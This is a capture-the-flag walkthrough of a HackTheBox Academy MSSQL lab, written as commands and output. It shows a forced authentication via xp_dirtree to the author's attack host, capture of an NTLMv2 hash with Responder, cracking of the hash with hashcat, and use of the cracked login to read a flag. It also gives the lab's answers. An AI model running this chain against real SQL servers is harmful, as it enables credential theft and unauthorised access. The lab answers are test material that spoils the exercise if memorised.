Attacking SQL Databases

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Attacking Common Services
🔗 Link: Attacking SQL Databases

Authenticate to 10.129.203.12 (ACADEMY-ATTCOMSVC-WIN-02) with user htbdbuser and password MSSQLAccess01!

❓Question¶

What is the password for the "mssqlsvc" user?

📋 Walkthrough¶

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ impacket-mssqlclient htbdbuser@10.129.203.12 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (htbdbuser  guest@master)> show databases;
ERROR(WIN-02\SQLEXPRESS): Line 1: Could not find stored procedure 'show'.
SQL (htbdbuser  guest@master)>

First, we connect to the SQL server using the impacket-mssqlclient tool with the provided credentials. We attempt to list the databases but encounter an error because the show databases command is not supported.

On attack machine

sudo responder -I tun0

Next, we start the responder tool on our attack machine to capture any NTLM hashes that might be sent over the network.

Request

SQL (htbdbuser  guest@master)> EXEC master..xp_dirtree '\\10.10.15.53\share\'
subdirectory   depth

We execute the xp_dirtree stored procedure to force the SQL server to authenticate to our responder instance, which will capture the NTLM hash.

Response

[SMB] NTLMv2-SSP Client   : 10.129.203.12
[SMB] NTLMv2-SSP Username : WIN-02\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::WIN-02:00598b5d1b0d91da:6A17E1B2780D4FF5BD389053521038A5:010100000000000080D16572B499DB01E3F9784A4CDF5E9B0000000002000800440053003800300001001E00570049004E002D0031004300550052004E004900590054004E0045004F002E0044005300380030002E004C004F00430041004C000300140044005300380030002E004C004F00430041004C000500140044005300380030002E004C004F00430041004C000700080080D16572B499DB0106000400020000000800300030000000000000000000000000300000DC2769331B161770BD2C2A6578996B418ACDE22E93439BC50C8147CCD61CAF4F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310035002E00350033000000000000000000

The responder tool captures the NTLM hash for the mssqlsvc user.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ echo "mssqlsvc::WIN-02:00598b5d1b0d91da:6A17E1B2780D4FF5BD389053521038A5:010100000000000080D16572B499DB01E3F9784A4CDF5E9B0000000002000800440053003800300001001E00570049004E002D0031004300550052004E004900590054004E0045004F002E0044005300380030002E004C004F00430041004C000300140044005300380030002E004C004F00430041004C000500140044005300380030002E004C004F00430041004C000700080080D16572B499DB0106000400020000000800300030000000000000000000000000300000DC2769331B161770BD2C2A6578996B418ACDE22E93439BC50C8147CCD61CAF4F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310035002E00350033000000000000000000" > hash

We save the captured hash to a file named hash.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

<SNIP>

MSSQLSVC::WIN-02:00598b5d1b0d91da:6a17e1b2780d4ff5bd389053521038a5:010100000000000080d16572b499db01e3f9784a4cdf5e9b0000000002000800440053003800300001001e00570049004e002d0031004300550052004e004900590054004e0045004f0004003400570049004e002d0031004300550052004e004900590054004e0045004f002e0044005300380030002e004c004f00430041004c000300140044005300380030002e004c004f00430041004c000500140044005300380030002e004c004f00430041004c000700080080d16572b499db0106000400020000000800300030000000000000000000000000300000dc2769331b161770bd2c2a6578996b418acde22e93439bc50c8147ccd61caf4f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e00350033000000000000000000:princess1

We use hashcat to crack the NTLM hash using the rockyou.txt wordlist. The password for the mssqlsvc user is revealed to be princess1.

MSSQLSVC:princess1

Answer

princess1

❓Question¶

Enumerate the "flagDB" database and submit a flag as your answer.

📋 Walkthrough¶

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ impacket-mssqlclient MSSQLSVC@10.129.203.12 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (WIN-02\mssqlsvc  WINSRV02\mssqlsvc@flagDB)> SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES
table_name   
----------   
tb_flag      


SQL (WIN-02\mssqlsvc  WINSRV02\mssqlsvc@flagDB)> select * from tb_flag;
flagvalue                              
------------------------------------   
b'HTB{!_l0v3_#4$#!n9_4nd_r3$p0nd3r}'

We connect to the SQL server using the mssqlsvc user and the cracked password. We then enumerate the tables in the flagDB database and find a table named tb_flag. Finally, we query the tb_flag table to retrieve the flag.

Answer

HTB{!_l0v3_#4$#!n9_4nd_r3$p0nd3r}